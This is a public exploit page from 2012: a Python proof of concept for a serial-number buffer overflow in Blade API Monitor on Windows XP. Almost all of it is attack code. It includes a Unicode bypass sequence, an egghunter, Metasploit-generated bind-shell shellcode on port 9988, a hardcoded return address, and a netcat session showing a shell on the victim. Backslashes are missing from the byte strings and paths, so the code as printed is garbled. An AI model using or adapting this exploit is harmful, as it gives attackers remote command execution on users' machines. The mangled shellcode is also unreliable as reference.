Blade API Monitor Unicode Bypass (Serial Number BOF)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Blade API Monitor Unicode Bypass (Serial Number BOF)
# Published : 2012-02-20
# Author :
# Previous Title : OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
# Next Title : SopCast 3.4.7 (Diagnose.exe) Improper Permissions
#!/usr/bin/python -w

#---------------------------------------------------------------------------------#
# Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF)                   #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com                      #
#                               http://www.fuzzysecurity.com/exploits/8.html      #
# OS: WinXP PRO SP3                                                               #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/     #
#           f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe    #
#                                                                                 #
# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/   #
#---------------------------------------------------------------------------------#
# This is a super strange exploit. First I would like to commend "FullMetalFouad" #
# for the unicode work on the original exploit. Originally I wanted to see if I   #
# could simplify the process. While I was doing that I lost sight of the fact     #
# that the instructions had to be printable since we need to copy them from a     #
# text file. When I opened my POC I saw that all the characters had been          #
# converted to weird blocks (check my site for a screenshot). On a whim I tried   #
# to paste these characters in the serial number field and amazingly the buffer   #
# in the debugger was intact but with one important difference, the unicode had   #
# been converted back to regular ASCII!! Very strange but super fortunate!! If    #
# you want to experiment with the exploit just keep in mind to (1) open it in     #
# windows notepad and (2) that all the characters need to be converted to those   #
# blocks for it to work (depending on your buffer this isn't always the case).    #
#---------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.128 9988                                          #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                       #
# Microsoft Windows XP [Version 5.1.2600]                                         #
# (C) Copyright 1985-2001 Microsoft Corp.                                         #
#                                                                                 #
# C:Program FilesBladeAPIMonitor>ipconfig                                       #
# ipconfig                                                                        #
#                                                                                 #
# Windows IP Configuration                                                        #
#                                                                                 #
#                                                                                 #
# Ethernet adapter Local Area Connection:                                         #
#                                                                                 #
#        Connection-specific DNS Suffix  . : localdomain                          #
#        IP Address. . . . . . . . . . . . : 192.168.111.128                      #
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0                        #
#        Default Gateway . . . . . . . . . :                                      #
#                                                                                 #
# C:Program FilesBladeAPIMonitor>                                               #
#---------------------------------------------------------------------------------#

filename="PasteMe.txt"

#---------------------------------------------------------------------------------#
# Originally unicode instructions to put an address in EAX, here it is used to    #
# trigger notepad bug and get UNICODE => ASCII conversion...                      #
#---------------------------------------------------------------------------------#
UniKill = (
"xB8x06xAAx6Fx50"
"x6Fx4Cx6Fx58x6F"
"x05x73x00x6FxB0"
"xB9xD8xAAx6FxE8")

#Egghunter - Marker b33f
#Size 32-bytes
hunter = (
"x66x81xcaxff"
"x0fx42x52x6a"
"x02x58xcdx2e"
"x3cx05x5ax74"
"xefxb8x62x33" #b3
"x33x66x8bxfa" #3f
"xafx75xeaxaf"
"x75xe7xffxe7")

#msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c
#Size 742-bytes
shellcode = (
"xd9xe1xd9x74x24xf4x59x49x49x49x49x49x49x49x49"
"x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41x58"
"x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
"x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c"
"x48x68x4bx39x37x70x45x50x53x30x71x70x4fx79x69"
"x75x34x71x79x42x53x54x4cx4bx71x42x64x70x6cx4b"
"x42x72x66x6cx6cx4bx73x62x57x64x4ex6bx73x42x36"
"x48x36x6fx4fx47x71x5ax44x66x56x51x49x6fx75x61"
"x69x50x4cx6cx45x6cx61x71x61x6cx63x32x44x6cx47"
"x50x49x51x6ax6fx56x6dx55x51x49x57x4bx52x58x70"
"x62x72x76x37x4ex6bx56x32x34x50x6cx4bx47x32x37"
"x4cx73x31x5ax70x6cx4bx61x50x62x58x4dx55x49x50"
"x63x44x50x4ax36x61x5ax70x50x50x6ex6bx33x78x74"
"x58x4cx4bx63x68x57x50x45x51x4ax73x38x63x67x4c"
"x42x69x4ex6bx56x54x6cx4bx47x71x7ax76x35x61x59"
"x6fx56x51x49x50x6ex4cx6bx71x4ax6fx46x6dx67x71"
"x48x47x46x58x59x70x62x55x4ax54x56x63x43x4dx79"
"x68x75x6bx73x4dx46x44x63x45x4bx52x61x48x6ex6b"
"x70x58x46x44x65x51x4bx63x32x46x4cx4bx44x4cx50"
"x4bx4cx4bx46x38x77x6cx65x51x6bx63x4cx4bx76x64"
"x6ex6bx56x61x38x50x6ex69x32x64x76x44x44x64x71"
"x4bx71x4bx75x31x73x69x72x7ax72x71x59x6fx59x70"
"x76x38x63x6fx51x4ax4cx4bx74x52x78x6bx4ex66x71"
"x4dx51x78x67x43x46x52x37x70x43x30x31x78x71x67"
"x51x63x35x62x71x4fx76x34x42x48x50x4cx53x47x31"
"x36x54x47x69x6fx49x45x68x38x4ex70x37x71x67x70"
"x35x50x37x59x7ax64x52x74x50x50x63x58x51x39x4b"
"x30x30x6bx75x50x39x6fx69x45x32x70x76x30x42x70"
"x66x30x73x70x62x70x31x50x42x70x43x58x49x7ax64"
"x4fx4bx6fx39x70x59x6fx5ax75x6bx39x78x47x30x31"
"x49x4bx62x73x33x58x74x42x43x30x65x77x53x34x4c"
"x49x4ax46x70x6ax44x50x46x36x56x37x63x58x79x52"
"x39x4bx34x77x55x37x6bx4fx38x55x62x73x76x37x53"
"x58x6fx47x4bx59x37x48x6bx4fx69x6fx58x55x72x73"
"x30x53x53x67x50x68x54x34x78x6cx65x6bx6bx51x39"
"x6fx6ex35x61x47x6cx49x78x47x73x58x31x65x70x6e"
"x30x4dx45x31x79x6fx49x45x43x58x50x63x70x6dx43"
"x54x67x70x4dx59x39x73x76x37x53x67x32x77x56x51"
"x69x66x30x6ax52x32x36x39x33x66x6ax42x6bx4dx62"
"x46x6bx77x30x44x34x64x35x6cx43x31x67x71x4cx4d"
"x50x44x74x64x32x30x6fx36x75x50x53x74x70x54x32"
"x70x70x56x56x36x76x36x62x66x76x36x72x6ex36x36"
"x52x76x71x43x30x56x73x58x64x39x7ax6cx35x6fx6c"
"x46x59x6fx6ex35x6bx39x59x70x70x4ex51x46x47x36"
"x39x6fx34x70x55x38x44x48x6cx47x37x6dx33x50x49"
"x6fx4ax75x6dx6bx5ax50x6fx45x79x32x72x76x55x38"
"x4fx56x4dx45x4fx4dx4fx6dx6bx4fx69x45x47x4cx67"
"x76x43x4cx55x5ax6dx50x79x6bx4dx30x51x65x33x35"
"x4fx4bx62x67x37x63x31x62x62x4fx53x5ax37x70x76"
"x33x49x6fx4bx65x41x41")

#---------------------------------------------------------------------------------#
# (*) Due to the wierd conversion i couldn't do proper badchar analysis           #
# (1) 0x00425e04 : push esp #  ret  | startnull,ascii ==> BladeAPIMonitor.exe     #
# (2) egghunter: We do this because we need more space than we have at ESP        #
# (3) alpha mixed Bindshell port 9988                                             #
#---------------------------------------------------------------------------------#

egg = "x90"*18 + hunter
evil = "x90"*10 + "b33f"*2 + shellcode
buffer = UniKill + "A"*560 + "x04x5Ex42x00" + egg + "B"*500 + evil

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()